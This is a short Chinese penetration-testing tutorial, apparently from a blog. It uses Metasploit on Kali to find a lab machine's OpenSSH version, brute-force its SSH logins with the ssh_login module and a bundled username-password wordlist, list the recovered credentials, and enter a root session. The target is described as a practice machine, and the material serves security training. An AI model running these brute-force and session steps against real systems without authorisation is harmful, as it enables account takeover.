目录
1.查看SSH服务的版本信息
打开kali系统的Metasploit软件。
编辑
search version
编辑
2.use auxiliary/scanner/ssh/ssh_version
编辑
3.show options
编辑 4.set RHOSTS 192.168.0.112 设置目标主机-靶机
编辑
5.run
编辑
版本是:SSH server version: SSH-2.0-OpenSSH_4.7p1 Debian-8ubuntu1
2.对ssh进行暴力破解
1.search ssh_login
编辑
2.使用模块use auxiliary/scanner/ssh/ssh_login
编辑
3.查看需要配置的参数show options
编辑
4.设置目标主机 set RHOSTS 192.168.0.112
编辑
5.设置字典
set USERPASS_FILE /usr/share/metasploit-framework/data/wordlists/root_userpass.txt
这个字典是kali自带的,后面我们可以自己下载一个更强大的字典导入到kali里面。
编辑
6.将破解的详细信息打印出来 set VERBOSE true
编辑
7.run
编辑
8.creds 列出所有数据库中的凭据,也就是账号和密码
编辑
9.sessions 查看会话
编辑
10. 进入会话 sessions -i 1
此时,我们是以root用户进来的。
编辑
